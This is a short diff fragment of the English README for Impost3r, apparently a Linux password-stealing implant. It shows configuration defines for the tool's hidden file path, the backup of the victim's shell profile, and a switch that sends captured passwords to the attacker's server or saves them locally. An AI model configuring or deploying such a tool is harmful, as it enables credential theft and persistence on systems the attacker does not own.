ph4ntonn/Impost3r/README_EN.md

     Custom setting
 */
 # define FILENAME "/tmp/.impost3r" \\Set the location where the Impost3r is on the server you attack.
-# define BACKUP_ORI_FILENAME ".bashrc" \\Indicates whether the source user profile backed up by the attacker is .bashrc, .bash_profile or .profile
+# define BACKUP_ORI_FILENAME ".bashrc" \\Indicates whether the source user profile backed up by the attacker is .bashrc or .bash_profile or .profile or .bash_login
 # define BACKUP_ORI_PATH "/tmp/.bashrc" \\Indicates the location of the source user profile backed up by the attacker on the target server
 # define SAVE_OR_SEND 0 \\Set the method you want to apply when Impost3r get the password,(send to your server=0,save the result on the current server=1,default is send)